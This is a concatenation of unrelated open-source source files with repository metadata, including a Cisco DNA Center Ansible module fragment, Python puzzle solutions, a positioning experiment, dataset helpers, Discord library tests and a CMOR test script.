description: Complete reference of the NetworkDeviceUpdateRole object model.
link: https://developer.cisco.com/docs/dna-center/api/1-3-3-x
# Reference by Internet resource
- name: NetworkDeviceUpdateRole reference
description: SDK reference.
link: https://dnacentersdk.readthedocs.io/en/latest/api/api.html#v2-1-1-summary
"""
EXAMPLES = r"""
- name: update_device_role
cisco.dnac.network_device_update_role:
state: update # required
id: SomeValue # string, required
role: SomeValue # string, required
roleSource: SomeValue # string, required
summary: True # boolean, required
"""
RETURN = """
update_device_role:
description: Updates the role of the device as access, core, distribution, border router.
returned: changed
type: dict
contains:
response:
description: NetworkDeviceBriefNIO's response.
returned: changed
type: dict
contains:
taskId:
description: It is the network device update role's taskId.
returned: changed
type: dict
url:
description: It is the network device update role's url.
returned: changed
type: str
sample: '<url>'
version:
description: NetworkDeviceBriefNIO's version.
returned: changed
type: str
sample: '1.0'
"""
|
[
"rcampos@altus.cr"
] |
rcampos@altus.cr
|
bbaf9c29390c28dc9d8519047288393f4d9b4247
|
455a91b28590d0b7ee1519f6d1ee2d554db4298b
|
/exps/exp_22102015/positioning_covar_meta.py
|
2719fdaf70712a3ec6f905739e3e081ec62ac8f3
|
[] |
no_license
|
yairbeer/my_repository
|
a038201fb12b19cb249eb98c17478b0c086a9b04
|
a07660b9db412c11ae3fb6835e15481e60a687ff
|
refs/heads/master
| 2021-01-10T01:20:27.010430
| 2015-11-19T08:47:55
| 2015-11-19T08:47:55
| 46,478,844
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,758
|
py
|
import numpy as np
import exps.exp_22102015.config_exp as cfg_exp
import exps.fn_exp as fn_exp
import functions as fn
import matplotlib.pyplot as plt
import exps.exp_22102015.track as track
import exps.exp_22102015.doa as doa
import itertools
import matplotlib.pyplot as plt
__author__ = 'YBeer'
"""
calculating probability density for each meta position. Then finding the density max.
"""
estimate_pos = []
for i in range(len(track.track_list)):
# single repeat
ap_direction = np.repeat(track.aps[:, 2].reshape((1, track.aps.shape[0])), doa.ap_timed_kaplan[i].shape[0], axis=0)
# Converting to predicted global angle
global_angle = ap_direction + doa.ap_timed_kaplan[i]
# Converting predicted angles into slopes
slopes = 1 / np.tan(np.radians(global_angle))
# Finding y intercept
y_intercept = track.aps[:, 1] * np.ones(slopes.shape) - slopes * track.aps[:, 0]
pos = np.ones((global_angle.shape[0], 2)) * np.nan
covars = []
for j in range(slopes.shape[0]):
valid_aps = fn_exp.find_crossing(global_angle[j, :])
if len(valid_aps) > 1:
couples = list(itertools.combinations(valid_aps, 2))
prelim_pos = []
weights = []
ellipse = []
for crossing in couples:
# Calculating cross-points
prelim_pos.append(fn_exp.crossings(slopes[j, :], y_intercept[j, :], crossing))
# Calculate distance between exp.aps and cross point
dist0, dist1 = fn_exp.crossings_dist(track.aps, crossing, prelim_pos[-1])
# Find angles from both exp.aps
angle0 = global_angle[j, crossing[0]]
angle1 = global_angle[j, crossing[1]]
# Calculate SD covariance
cur_eigen_val, cur_eigen_angles = fn_exp.sd_eigen(angle0, angle1, dist0, dist1)
cur_covars = fn_exp.sd_covar(cur_eigen_val, cur_eigen_angles)
covars.append(cur_covars)
ellipse.append(fn_exp.create_ellipse(prelim_pos[-1], cur_eigen_val, cur_eigen_angles))
pos[j] = fn_exp.estimate_xy_covar(prelim_pos, covars)
# print prelim_pos, covars
# if len(valid_aps) == 3:
# plt.plot(prelim_pos[0][0], prelim_pos[0][1], 'ro', ellipse[0][:, 0], ellipse[0][:, 1], 'r--',
# prelim_pos[1][0], prelim_pos[1][1], 'go', ellipse[1][:, 0], ellipse[1][:, 1], 'g--',
# prelim_pos[2][0], prelim_pos[2][1], 'bo', ellipse[2][:, 0], ellipse[2][:, 1], 'b--',
# pos[j][0], pos[j][1], 'ko',
# track.track[i][j, 0], track.track[i][j, 1], 'k^',)
# plt.title(str([cur_eigen_val, cur_eigen_angles[0], cur_covars]))
# plt.show()
# Change NaN to last known position
pos = fn.remove_nan(pos)
# Remove points from outside
# pos = fn.remove_outside(pos)
estimate_pos.append(pos)
# Holt's filtering algorithm
holt = np.zeros(pos.shape)
holt[0, :] = pos[0, :]
holt_trend = np.zeros(pos.shape)
for j in range(1, pos.shape[0]):
holt[j, :] = (1 - cfg_exp.alpha) * (holt[j-1, :] + holt_trend[j-1, :]) + cfg_exp.alpha * pos[j, :]
holt_trend[j, :] = cfg_exp.trend * (holt[j, :] - holt[j-1, :]) + (1 - cfg_exp.trend) * holt_trend[j-1, :]
# RSME over 1st track
RSME = np.sqrt(np.sum((track.track[0][:, 0] - estimate_pos[0][:, 0]) ** 2 +
(track.track[0][:, 1] - estimate_pos[0][:, 1]) ** 2) / estimate_pos[0].shape[0])
print RSME
# 1D plot
plt.figure(1)
plt.subplot(221)
plt.plot(track.track_time_int[0], track.track[0][:, 0], 'r', track.track_time_int[0], estimate_pos[0][:, 0], 'b')
plt.title('track 0 x(t) axis tracking')
plt.ylim((-5, 130))
plt.subplot(222)
plt.plot(track.track_time_int[0], track.track[0][:, 1], 'r', track.track_time_int[0], estimate_pos[0][:, 1], 'b')
plt.title('track 0 y(t) axis tracking')
plt.ylim((-5, 100))
plt.subplot(223)
plt.plot(track.track_time_int[1], track.track[1][:, 0], 'r', track.track_time_int[1], estimate_pos[1][:, 0], 'b')
plt.title('track 1 x(t) axis tracking')
plt.ylim((-5, 130))
plt.subplot(224)
plt.plot(track.track_time_int[1], track.track[1][:, 1], 'r', track.track_time_int[1], estimate_pos[1][:, 1], 'b')
plt.title('track 1 y(t) axis tracking')
plt.ylim((-5, 100))
plt.show()
# 2D plot
plt.figure(1)
plt.subplot(211)
plt.plot(track.track[0][:, 0], track.track[0][:, 1], 'r', estimate_pos[0][:, 0], estimate_pos[0][:, 1], 'b')
plt.title('track 0 pos tracking')
plt.subplot(212)
plt.plot(track.track[1][:, 0], track.track[1][:, 1], 'r', estimate_pos[1][:, 0], estimate_pos[1][:, 1], 'b')
plt.title('track 1 pos tracking')
plt.show()
|
[
"yaia1309@gmail.com"
] |
yaia1309@gmail.com
|
49aa9867f2de64f94bc8bce9aee367e02d4c0ece
|
bbab25f702c7bb7ce6cd894d98a121e61967d48a
|
/controllers/controllers.py
|
11968a608c0f21d15bc486b283939dc4dc43cadd
|
[] |
no_license
|
butirpadi/bp_po_carton_box_report
|
9b83310ea010dbe848857cae74642e6993431d58
|
2f9bad119b1fe371bf4bc2d8ba09917c2134f86b
|
refs/heads/master
| 2023-08-30T03:49:11.564193
| 2021-11-01T09:23:11
| 2021-11-01T09:23:11
| 309,541,390
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 935
|
py
|
# -*- coding: utf-8 -*-
from odoo import http
# class BpPoCartonBoxReport(http.Controller):
# @http.route('/bp_po_carton_box_report/bp_po_carton_box_report/', auth='public')
# def index(self, **kw):
# return "Hello, world"
# @http.route('/bp_po_carton_box_report/bp_po_carton_box_report/objects/', auth='public')
# def list(self, **kw):
# return http.request.render('bp_po_carton_box_report.listing', {
# 'root': '/bp_po_carton_box_report/bp_po_carton_box_report',
# 'objects': http.request.env['bp_po_carton_box_report.bp_po_carton_box_report'].search([]),
# })
# @http.route('/bp_po_carton_box_report/bp_po_carton_box_report/objects/<model("bp_po_carton_box_report.bp_po_carton_box_report"):obj>/', auth='public')
# def object(self, obj, **kw):
# return http.request.render('bp_po_carton_box_report.object', {
# 'object': obj
# })
|
[
"butirpadi@gmail.com"
] |
butirpadi@gmail.com
|
fa3baa33bdde98c67faa2adaf19e614694f489e8
|
00a9128553902cb398dc99865d36e09159285b86
|
/python/p3.py
|
1f8b36777f8dc1b69701b73902672fc201d33c6f
|
[] |
no_license
|
horacepan/aoc2020
|
f498faa8c8bba4cabcfba6508a73074adb51d84c
|
f6d38f2b37245e89fb6f8eb4c55c74423626ca04
|
refs/heads/main
| 2023-02-06T03:16:21.530346
| 2020-12-20T21:33:53
| 2020-12-20T21:33:53
| 317,640,340
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 775
|
py
|
import pdb
def solve(mat, dx, dy):
rows = len(mat)
cols = len(mat[0])
loc_x = 0
loc_y = 0
ntrees = 0
while 1:
if loc_x < rows:
ntrees += int(mat[loc_x][loc_y] == '#')
else:
break
loc_x += dx
loc_y = (loc_y + dy) % cols
return ntrees
def main():
fname = '../data/p3.txt'
with open(fname, 'r') as f:
mat = []
for line in f.readlines():
mat.append(line.strip())
a1 = solve(mat, 1, 1)
a2 = solve(mat, 1, 3)
a3 = solve(mat, 1, 5)
a4 = solve(mat, 1, 7)
a5 = solve(mat, 2, 1)
prod = a1 * a2 * a3 * a4 * a5
print("Part one:", a2)
print("Part two:", prod)
if __name__ == '__main__':
main()
|
[
"hopan@uchicago.edu"
] |
hopan@uchicago.edu
|
c40632c9ff9da232e070e4cdd547dfd5cc32f0d4
|
31e1261588e953d4e702a76e1c5306a8a97cff04
|
/monk/gluon/datasets/paths.py
|
c4656a51daa42e9c5cca5e8dd8767763c42c03c2
|
[
"Apache-2.0"
] |
permissive
|
Varun0801/monk_v1
|
cff6e8390a9248208ba825eb0046119f4f284ab1
|
559ff37669d88fd2cfaaf9d22ad84cd6cef9d176
|
refs/heads/master
| 2022-04-17T05:19:53.372524
| 2020-04-11T13:11:35
| 2020-04-11T13:11:35
| 255,113,878
| 1
| 0
| null | 2020-04-12T15:35:25
| 2020-04-12T15:35:24
| null |
UTF-8
|
Python
| false
| false
| 4,546
|
py
|
from gluon.datasets.imports import *
from system.imports import *
@accepts(dict, [str, list, bool], [float, int, bool], [str, list, bool], str, post_trace=True)
@TraceFunction(trace_args=False, trace_rv=False)
def set_dataset_train_path(system_dict, path, split, path_to_csv, delimiter):
'''
Set dataset train path
Args:
system_dict (dict): System dictionary containing all the variables
path (str, list): Dataset folder path
1) String : For dataset with no validation set
2) List: For dataset with validation set in order [train_set, val_set]
split (float): Indicating train validation split
Division happens as follows:
train - total dataset * split * 100
val - total dataset * (1-split) * 100
path_to_csv (str, list): Path to csv pointing to images
delimiter (str): Delimiter for the csv path provided
Returns:
dict: Updated System dictionary
'''
dataset_type = None;
dataset_train_path = None;
dataset_val_path = None;
csv_train = None;
csv_val = None;
train_val_split = None;
if(path_to_csv):
if(type(path) == str):
dataset_type = "csv_train";
csv_train = path_to_csv;
dataset_train_path = path;
train_val_split = split;
label_type = find_label_type(path_to_csv)
elif(type(path) == list):
dataset_type = "csv_train-val";
csv_train = path_to_csv[0];
csv_val = path_to_csv[1];
dataset_train_path = path[0];
dataset_val_path = path[1];
train_val_split = None;
label_type = find_label_type(path_to_csv[0])
else:
if(type(path) == str):
dataset_type = "train";
dataset_train_path = path;
train_val_split = split;
label_type = "single";
elif(type(path) == list):
dataset_type = "train-val";
dataset_train_path = path[0];
dataset_val_path = path[1];
train_val_split = None;
label_type = "single";
system_dict["dataset"]["dataset_type"] = dataset_type;
system_dict["dataset"]["train_path"] = dataset_train_path;
system_dict["dataset"]["val_path"] = dataset_val_path;
system_dict["dataset"]["csv_train"] = csv_train;
system_dict["dataset"]["csv_val"] = csv_val;
system_dict["dataset"]["params"]["train_val_split"] = train_val_split;
system_dict["dataset"]["params"]["delimiter"] = delimiter;
system_dict["dataset"]["label_type"] = label_type;
return system_dict;
@accepts(str, post_trace=True)
@TraceFunction(trace_args=True, trace_rv=True)
def find_label_type(csv_file):
'''
Find label type - single or multiple
Args:
csv_file (str): Path to training csv file
Returns:
str: Label Type
'''
label_type = "single";
df = pd.read_csv(csv_file);
columns = df.columns;
for i in range(len(df)):
label = str(df[columns[1]][i]);
if(len(label.split(" ")) > 1):
label_type = "multiple";
break;
return label_type;
@accepts(dict, [str, bool], [str, bool], str, post_trace=True)
@TraceFunction(trace_args=False, trace_rv=False)
def set_dataset_test_path(system_dict, path, path_to_csv, delimiter):
'''
Set dataset train path
Args:
system_dict (dict): System dictionary containing all the variables
path (str, list): Dataset folder path
1) String : For dataset with no validation set
2) List: For dataset with validation set in order [train_set, val_set]
path_to_csv (str, list): Path to csv pointing to images
delimiter (str): Delimiter for the csv path provided
Returns:
dict: Updated System dictionary
'''
dataset_test_type = None;
dataset_test_path = None;
csv_test = None;
if(path_to_csv):
csv_test = path_to_csv;
dataset_test_path = path;
dataset_test_type = "csv";
else:
dataset_test_path = path;
dataset_test_type = "foldered";
system_dict["dataset"]["test_path"] = dataset_test_path;
system_dict["dataset"]["csv_test"] = csv_test;
system_dict["dataset"]["params"]["test_delimiter"] = delimiter;
system_dict["dataset"]["params"]["dataset_test_type"] = dataset_test_type;
return system_dict;
|
[
"abhishek4273@gmail.com"
] |
abhishek4273@gmail.com
|
3a9bd176b6447bea26b249ad12815762e165a913
|
c80314871502377180b1d496d0d4e7dc9e8cdba8
|
/exercise/python_1040_practice_algo_recursion_hanoi.py
|
abbc470f6e534414af43740e26a3719053d2293e
|
[] |
no_license
|
tomboxfan/PythonExample
|
996896bcbc0bf83fbca7d28bcb207dca35875f6b
|
8b071314b4dc4c3e3acccb835405c44630a15722
|
refs/heads/master
| 2023-02-11T13:55:26.591124
| 2021-01-09T03:20:46
| 2021-01-09T03:20:46
| 275,275,138
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,672
|
py
|
'''
Requirement:
The Tower of Hanoi puzzle was invented by the French mathematician Edouard Lucas in 1883.
He was inspired by a legend that tells of a Hindu temple where the puzzle was presented to young priests.
At the beginning of time, the priests were given three poles and a stack of 64 gold disks,
each disk a little smaller than the one beneath it.
Their assignment was to transfer all 64 disks from one of the three poles to another, with two important constraints.
1) They could only move one disk at a time.
2) They could never place a larger disk on top of a smaller one.
The priests worked very efficiently, day and night, moving one disk every second.
When they finished their work, the legend said, the temple would crumble into dust and the world would vanish.
Although the legend is interesting, you need not worry about the world ending any time soon.
The number of moves required to correctly move a tower of 64 disks is 2^64−1=18,446,744,073,709,551,615.
At a rate of one move per second, that is 584,942,417,355 years! Clearly there is more to this puzzle than meets the eye.
'''
def tower_of_hanoi(n, from_rod, to_rod, help_rod):
if n == 1:
print(f"Move disk {n} from {from_rod} to {to_rod}" )
else:
# Step 1) Move n-1 plates from 'from_rod' to 'help_rod', via 'to_rod'.
tower_of_hanoi(n-1, from_rod, help_rod, to_rod)
# Step 2) Move plate n from 'from_rod' to 'to_rod'
print(f"Move disk {n} from {from_rod} to {to_rod}")
# Step 3) Move n-1 plates from 'help_rod' to 'to_rod', via 'from_rod'.
tower_of_hanoi(n-1, help_rod, to_rod, from_rod)
tower_of_hanoi(4, 'A', 'C', 'B')
|
[
"tomboxfan@hotmail.com"
] |
tomboxfan@hotmail.com
|
e6f61f08c4027bfec92381e04e2087c07efa6800
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03592/s369623086.py
|
0473e1e86b92c11c4dd5abc861aa31996a132b45
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 926
|
py
|
import sys, re
from collections import deque, defaultdict, Counter
from math import ceil, sqrt, hypot, factorial, pi, sin, cos, radians
from itertools import accumulate, permutations, combinations, product, groupby
from operator import itemgetter, mul
from copy import deepcopy
from string import ascii_lowercase, ascii_uppercase, digits
from bisect import bisect, bisect_left
from fractions import gcd
from heapq import heappush, heappop
from functools import reduce
def input(): return sys.stdin.readline().strip()
def INT(): return int(input())
def MAP(): return map(int, input().split())
def LIST(): return list(map(int, input().split()))
def ZIP(n): return zip(*(MAP() for _ in range(n)))
sys.setrecursionlimit(10 ** 9)
INF = float('inf')
mod = 10 ** 9 + 7
H, W, K = MAP()
for x in range(H+1):
y = (K-x*W)/(H-2*x) if H !=2*x else (H*W-K)/H
if y.is_integer() and 0 <= y <= W:
print("Yes")
break
else:
print("No")
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
5b17863999522ec2777bdd7083007c20f69cbd08
|
df7f13ec34591fe1ce2d9aeebd5fd183e012711a
|
/hata/discord/channel/channel_metadata/tests/test__ChannelMetadataGuildThreadAnnouncements__utility.py
|
79cd654d880a07831297665da13916f7b7c4630c
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
HuyaneMatsu/hata
|
63e2f6a2d7a7539fd8f18498852d9d3fe5c41d2e
|
53f24fdb38459dc5a4fd04f11bdbfee8295b76a4
|
refs/heads/master
| 2023-08-20T15:58:09.343044
| 2023-08-20T13:09:03
| 2023-08-20T13:09:03
| 163,677,173
| 3
| 3
|
Apache-2.0
| 2019-12-18T03:46:12
| 2018-12-31T14:59:47
|
Python
|
UTF-8
|
Python
| false
| false
| 7,445
|
py
|
from datetime import datetime as DateTime
import vampytest
from ..guild_thread_base import ChannelMetadataGuildThreadBase
from .test__ChannelMetadataGuildThreadBase__constructor import _assert_fields_set
def test__ChannelMetadataGuildThreadBase__copy():
"""
Tests whether ``ChannelMetadataGuildThreadBase.copy` works as intended.
"""
name = 'alice'
parent_id = 202304120047
created_at = DateTime(2016, 4, 4)
archived = False
archived_at = DateTime(2017, 4, 4)
auto_archive_after = 3600
open_ = True
owner_id = 202304120048
slowmode = 30
channel_metadata = ChannelMetadataGuildThreadBase(
name = name,
parent_id = parent_id,
created_at = created_at,
archived = archived,
archived_at = archived_at,
auto_archive_after = auto_archive_after,
open = open_,
owner_id = owner_id,
slowmode = slowmode,
)
copy = channel_metadata.copy()
_assert_fields_set(copy)
vampytest.assert_is_not(copy, channel_metadata)
vampytest.assert_eq(copy, channel_metadata)
def test__ChannelMetadataGuildThreadBase__copy_with__0():
"""
Tests whether ``ChannelMetadataGuildThreadBase.copy_with` works as intended.
Case: No fields.
"""
name = 'alice'
parent_id = 202304120049
created_at = DateTime(2016, 4, 4)
archived = False
archived_at = DateTime(2017, 4, 4)
auto_archive_after = 3600
open_ = True
owner_id = 202304120050
slowmode = 30
channel_metadata = ChannelMetadataGuildThreadBase(
name = name,
parent_id = parent_id,
created_at = created_at,
archived = archived,
archived_at = archived_at,
auto_archive_after = auto_archive_after,
open = open_,
owner_id = owner_id,
slowmode = slowmode,
)
copy = channel_metadata.copy_with()
_assert_fields_set(copy)
vampytest.assert_is_not(copy, channel_metadata)
vampytest.assert_eq(copy, channel_metadata)
def test__ChannelMetadataGuildThreadBase__copy_with__1():
"""
Tests whether ``ChannelMetadataGuildThreadBase.copy_with` works as intended.
Case: All fields.
"""
old_name = 'alice'
old_parent_id = 202304120051
old_created_at = DateTime(2016, 4, 4)
old_archived = False
old_archived_at = DateTime(2017, 4, 4)
old_auto_archive_after = 3600
old_open = True
old_owner_id = 202304120052
old_slowmode = 30
new_name = 'emotion'
new_parent_id = 202304120053
new_created_at = DateTime(2016, 4, 5)
new_archived = True
new_archived_at = DateTime(2017, 4, 5)
new_auto_archive_after = 604800
new_open = False
new_owner_id = 202304120054
new_slowmode = 31
channel_metadata = ChannelMetadataGuildThreadBase(
name = old_name,
parent_id = old_parent_id,
created_at = old_created_at,
archived = old_archived,
archived_at = old_archived_at,
auto_archive_after = old_auto_archive_after,
open = old_open,
owner_id = old_owner_id,
slowmode = old_slowmode,
)
copy = channel_metadata.copy_with(
name = new_name,
parent_id = new_parent_id,
created_at = new_created_at,
archived = new_archived,
archived_at = new_archived_at,
auto_archive_after = new_auto_archive_after,
open = new_open,
owner_id = new_owner_id,
slowmode = new_slowmode,
)
_assert_fields_set(copy)
vampytest.assert_is_not(copy, channel_metadata)
vampytest.assert_eq(copy.name, new_name)
vampytest.assert_eq(copy.parent_id, new_parent_id)
vampytest.assert_eq(copy._created_at, new_created_at)
vampytest.assert_eq(copy.archived, new_archived)
vampytest.assert_eq(copy.archived_at, new_archived_at)
vampytest.assert_eq(copy.auto_archive_after, new_auto_archive_after)
vampytest.assert_eq(copy.open, new_open)
vampytest.assert_eq(copy.owner_id, new_owner_id)
vampytest.assert_eq(copy.slowmode, new_slowmode)
def test__ChannelMetadataGuildThreadBase__copy_with_keyword_parameters__0():
"""
Tests whether ``ChannelMetadataGuildThreadBase.copy_with_keyword_parameters` works as intended.
Case: No fields.
"""
name = 'alice'
parent_id = 202304120055
created_at = DateTime(2016, 4, 4)
archived = False
archived_at = DateTime(2017, 4, 4)
auto_archive_after = 3600
open_ = True
owner_id = 202304120056
slowmode = 30
channel_metadata = ChannelMetadataGuildThreadBase(
name = name,
parent_id = parent_id,
created_at = created_at,
archived = archived,
archived_at = archived_at,
auto_archive_after = auto_archive_after,
open = open_,
owner_id = owner_id,
slowmode = slowmode,
)
keyword_parameters = {}
copy = channel_metadata.copy_with_keyword_parameters(keyword_parameters)
_assert_fields_set(copy)
vampytest.assert_is_not(copy, channel_metadata)
vampytest.assert_eq(keyword_parameters, {})
vampytest.assert_eq(copy, channel_metadata)
def test__ChannelMetadataGuildThreadBase__copy_with_keyword_parameters__1():
"""
Tests whether ``ChannelMetadataGuildThreadBase.copy_with_keyword_parameters` works as intended.
Case: All fields.
"""
old_name = 'alice'
old_parent_id = 202304120057
old_created_at = DateTime(2016, 4, 4)
old_archived = False
old_archived_at = DateTime(2017, 4, 4)
old_auto_archive_after = 3600
old_open = True
old_owner_id = 202304120058
old_slowmode = 30
new_name = 'emotion'
new_parent_id = 202304120059
new_created_at = DateTime(2016, 4, 5)
new_archived = True
new_archived_at = DateTime(2017, 4, 5)
new_auto_archive_after = 604800
new_open = False
new_owner_id = 202304120060
new_slowmode = 31
channel_metadata = ChannelMetadataGuildThreadBase(
name = old_name,
parent_id = old_parent_id,
created_at = old_created_at,
archived = old_archived,
archived_at = old_archived_at,
auto_archive_after = old_auto_archive_after,
open = old_open,
owner_id = old_owner_id,
slowmode = old_slowmode,
)
keyword_parameters = {
'name': new_name,
'parent_id': new_parent_id,
'created_at': new_created_at,
'archived': new_archived,
'archived_at': new_archived_at,
'auto_archive_after': new_auto_archive_after,
'open': new_open,
'owner_id': new_owner_id,
'slowmode': new_slowmode,
}
copy = channel_metadata.copy_with_keyword_parameters(keyword_parameters)
_assert_fields_set(copy)
vampytest.assert_is_not(copy, channel_metadata)
vampytest.assert_eq(keyword_parameters, {})
vampytest.assert_eq(copy.name, new_name)
vampytest.assert_eq(copy.parent_id, new_parent_id)
vampytest.assert_eq(copy._created_at, new_created_at)
vampytest.assert_eq(copy.archived, new_archived)
vampytest.assert_eq(copy.archived_at, new_archived_at)
vampytest.assert_eq(copy.auto_archive_after, new_auto_archive_after)
vampytest.assert_eq(copy.open, new_open)
vampytest.assert_eq(copy.owner_id, new_owner_id)
vampytest.assert_eq(copy.slowmode, new_slowmode)
|
[
"re.ism.tm@gmail.com"
] |
re.ism.tm@gmail.com
|
2f716cb7b50e626cfc3fb1549ff0e4f0ef60f3e3
|
eaaecada4c78c899bfdb6a83aaf66502a7d4bc4c
|
/data_augmentation/eda/image/task.py
|
b35e6ade3e8418844f9ba5b2dd23402bc1d86d19
|
[
"MIT"
] |
permissive
|
simran-arora/emmental-tutorials
|
72552d6bcb3311e011f99fa6d164fa619c913283
|
249a82a57be58e960408a45e2e0daa72980d210a
|
refs/heads/master
| 2022-12-01T20:12:55.613955
| 2020-08-13T08:16:12
| 2020-08-13T08:16:12
| 286,825,852
| 0
| 0
|
MIT
| 2020-08-11T19:01:59
| 2020-08-11T19:01:58
| null |
UTF-8
|
Python
| false
| false
| 2,621
|
py
|
import logging
from functools import partial
import numpy as np
import torch
import torch.nn.functional as F
from emmental.scorer import Scorer
from emmental.task import EmmentalTask
from torch import nn
from eda.image.config import TASK_INPUT_SIZE, TASK_METRIC, TASK_NUM_CLASS
from eda.image.models import ALL_MODELS
from eda.image.modules.soft_cross_entropy_loss import SoftCrossEntropyLoss
logger = logging.getLogger(__name__)
SCE = SoftCrossEntropyLoss(reduction="none")
def sce_loss(module_name, intermediate_output_dict, Y, active):
if len(Y.size()) == 1:
label = intermediate_output_dict[module_name][0].new_zeros(
intermediate_output_dict[module_name][0].size()
)
label.scatter_(1, Y.view(Y.size()[0], 1), 1.0)
else:
label = Y
return SCE(intermediate_output_dict[module_name][0][active], label[active])
def output_classification(module_name, immediate_output_dict):
return F.softmax(immediate_output_dict[module_name][0], dim=1)
def create_task(args):
task_name = args.task
n_class = TASK_NUM_CLASS[args.task]
if args.model in ["wide_resnet"]:
feature_extractor = ALL_MODELS[args.model](
args.wide_resnet_depth,
args.wide_resnet_width,
args.wide_resnet_dropout,
n_class,
has_fc=False,
)
n_hidden_dim = feature_extractor(
torch.randn(TASK_INPUT_SIZE[args.task])
).size()[-1]
elif args.model == "mlp":
n_hidden_dim = args.mlp_hidden_dim
input_dim = np.prod(TASK_INPUT_SIZE[args.task])
feature_extractor = ALL_MODELS[args.model](
input_dim, n_hidden_dim, n_class, has_fc=False
)
else:
raise ValueError(f"Invalid model {args.model}")
loss = sce_loss
output = output_classification
logger.info(f"Built model: {feature_extractor}")
return EmmentalTask(
name=args.task,
module_pool=nn.ModuleDict(
{
"feature": feature_extractor,
f"{task_name}_pred_head": nn.Linear(n_hidden_dim, n_class),
}
),
task_flow=[
{"name": "feature", "module": "feature", "inputs": [("_input_", "image")]},
{
"name": f"{task_name}_pred_head",
"module": f"{task_name}_pred_head",
"inputs": [("feature", 0)],
},
],
loss_func=partial(loss, f"{task_name}_pred_head"),
output_func=partial(output, f"{task_name}_pred_head"),
scorer=Scorer(metrics=TASK_METRIC[task_name]),
)
|
[
"senwu@cs.stanford.edu"
] |
senwu@cs.stanford.edu
|
dd93ddbc2c6ada0eec838318e43428eb9841c4f1
|
e19ddf30bf87a4efdc449fa49b9621ca1460a515
|
/castle/theme/interfaces.py
|
5d42e09dbd195823850c02a445e872c1457cc0c0
|
[] |
no_license
|
castlecms/castle.theme
|
a220d25b1cf40fa47fb4af9be3cfa8d6a1cc75c9
|
4a36537ddc4db59ea2902a71e544f5a319a5a15c
|
refs/heads/master
| 2022-11-02T10:53:04.758867
| 2020-02-21T21:28:10
| 2020-02-21T21:28:10
| 72,666,053
| 5
| 3
| null | 2022-10-05T11:20:53
| 2016-11-02T17:47:59
|
CSS
|
UTF-8
|
Python
| false
| false
| 209
|
py
|
from zope.interface import Interface
class ICustomTheme(Interface):
"""Marker interface that defines a Zope 3 browser layer.
"""
class IUtils(Interface):
def get_folder_section():
pass
|
[
"vangheem@gmail.com"
] |
vangheem@gmail.com
|
911fe05a24b4aea8350196fde947b9a287d1e07d
|
638af6b8c580eeae23fc1034882c4b514195137a
|
/Packages/cmor/Test/test_python_common.py
|
c4566b2f070f86cc7058dd832773ef15518464f7
|
[] |
no_license
|
doutriaux1/uvcdat
|
83684a86b514b8cac4d8900a503fc13d557fc4d2
|
37e9635f988696c346b4c3cdb49144d1e21dab5d
|
refs/heads/master
| 2021-01-17T07:57:22.897539
| 2015-02-02T22:52:12
| 2015-02-02T22:52:12
| 14,878,320
| 1
| 0
| null | 2015-02-19T20:54:25
| 2013-12-02T23:44:46
|
C
|
UTF-8
|
Python
| false
| false
| 4,668
|
py
|
import numpy
# this test tries to mimic ippc_test_code.c but from python
# This one is using direct C calls from python not the python around it
ntimes=2
lon=4
lat=3
lev=5
lev2=17
varin3d=["CLOUD", "U", "T" ];
# /* Units appropriate to my data */
units3d=["%", "m s-1", "K"];
# /* Corresponding IPCC Table A1c entry (variable name) */
entry3d=["cl","ua","ta"];
# /* My variable names for IPCC Table A1a fields */
varin2d=[ "LATENT","TSURF","SOIL_WET","PSURF" ];
# /* Units appropriate to my data */
units2d=[ "W m-2","K","kg m-2","Pa"];
positive2d=["down"," ", " ", " "];
# /* Corresponding IPCC Table A1a entry (variable name) */
entry2d=["hfls", "tas","mrsos","ps"];
def gen_irreg_grid(lon,lat):
lon0 = 280.
lat0=0.;
delta_lon = 10.;
delta_lat = 10.;
y = numpy.arange(lat)
x = numpy.arange(lon)
lon_coords = numpy.zeros((lat,lon))
lat_coords = numpy.zeros((lat,lon))
lon_vertices = numpy.zeros((lat,lon,4))
lat_vertices = numpy.zeros((lat,lon,4))
for j in range(lat): # really porr coding i know
for i in range(lon): # getting worse i know
lon_coords[j,i] = lon0+delta_lon*(j+1+i);
lat_coords[j,i] = lat0+delta_lat*(j+1-i);
lon_vertices[j,i,0] = lon_coords[j,i]-delta_lon;
lon_vertices[j,i,1] = lon_coords[j,i];
lon_vertices[j,i,2] = lon_coords[j,i]+delta_lon;
lon_vertices[j,i,3] = lon_coords[j,i];
## !!$ /* vertices lat */
lat_vertices[j,i,0] = lat_coords[j,i];
lat_vertices[j,i,1] = lat_coords[j,i]-delta_lat;
lat_vertices[j,i,2] = lat_coords[j,i];
lat_vertices[j,i,3] = lat_coords[j,i]+delta_lat;
return x,y,lon_coords,lat_coords,lon_vertices,lat_vertices
# read_data funcs are highly unoptimzed....
def read_coords(lon,lat,lev):
alons = numpy.zeros(lon)
bnds_lon = numpy.zeros(2*lon)
alats = numpy.zeros(lat)
bnds_lat = numpy.zeros(2*lat)
plevs = numpy.zeros(lev,dtype='i')
for i in range(lon):
alons[i] = i*360./lon
bnds_lon[2*i] = (i - 0.5)*360./lon
bnds_lon[2*i+1] = (i + 0.5)*360./lon
for i in range(lat):
alats[i] = (lat-i)*10
bnds_lat[2*i] = (lat-i)*10 + 5.
bnds_lat[2*i+1] = (lat-i)*10 - 5.
plevs = numpy.array([100000., 92500., 85000., 70000.,
60000., 50000., 40000., 30000., 25000., 20000.,
15000., 10000., 7000., 5000., 3000., 2000., 1000.])
return alats, alons, plevs, bnds_lat, bnds_lon
def read_time(it):
time = [0]
time_bnds=[0,0]
time[0] = (it-0.5)*30.;
